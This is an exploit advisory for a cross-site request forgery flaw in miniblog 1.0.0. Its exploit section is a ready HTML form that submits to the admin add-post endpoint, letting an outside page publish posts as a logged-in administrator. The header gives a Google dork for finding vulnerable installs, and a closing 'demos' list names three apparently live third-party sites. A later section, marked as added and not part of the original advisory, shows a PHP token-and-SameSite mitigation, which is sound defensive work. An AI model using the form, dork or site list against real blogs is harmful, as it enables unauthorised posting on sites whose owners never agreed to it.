miniblog 1.0.0 CSRF add post

Author: Mustafa Moshkela, Published: 01-05-2015
#########################################

[+] Author: Mustafa Moshkela

[+] Exploit Title: miniblog add post

[+] Date: 25-4-2015

[+] Category: WebApp

[+] Vendor: http://www.spyka.net/scripts/php/miniblog

[+] Google Dork: Powered by miniblog 1.0.0.

[+] Tested on: Windows 8

#########################################

exploit:


<form action="http://example.com/adm/admin.php?mode=add" method="post">
<p>
<label for="title">Post title:</label>
<input type="text" size="80" id="title" name="data[post_title]" value="" />
</p>

<p>
<label for="content">Post content:</label>
<textarea cols="77" rows="10" id="content" name="data[post_content]"></textarea>
<span class="form-text">To format just use raw HTML.. &lt;strong&gt;, &lt;span&gt;, etc</span>
</p>
<p>
<label for="status">Post status:</label>
<select id="status" name="data[published]">
<option value="1">Published</option>
</select>
</p>
<p>
<input class="button" type="submit" name="miniblog_PostBack" value="Add" />
</p>
<p>
Coded By Mustafa Moshkela<br><br>
iq-team.org
</p>
</form>
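
mitigation (added example, not part of the original advisory and not miniblog's own code):

The form above carries only field values and no per-session secret, which is what lets a page on another site submit it on behalf of a logged-in administrator. The sketch below shows a synchronizer-token check for the add-post request; the function names, the csrf_token field and the session key are assumptions made for illustration, and the SameSite cookie option needs PHP 7.3 or later.

```php
<?php
// Added example: hypothetical CSRF protection for an add-post handler.
// csrf_token(), csrf_check() and the 'csrf_token' key are illustrative names.
declare(strict_types=1);

// Defence in depth: a SameSite=Lax session cookie is not sent with cross-site POSTs.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

/** Return the per-session CSRF token, creating it on first use. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** True only if the submitted token matches the one stored in the session. */
function csrf_check(array $post): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time; reject arrays and empty tokens first.
    return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Reject the state-changing request before any post is created.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['miniblog_PostBack'])) {
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    // Token verified: the application's existing add-post logic runs from here.
}
?>
<form action="admin.php?mode=add" method="post">
  <!-- Hidden token: a third-party page cannot read it, so it cannot forge the request. -->
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>" />
  <!-- existing fields: data[post_title], data[post_content], data[published] -->
  <input class="button" type="submit" name="miniblog_PostBack" value="Add" />
</form>
```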



demos:

http://www.mailprep.com/
http://blumen-schober.de/miniblog/
http://willanhouse.com/

Greets to: all members in iq-team.org

#########################################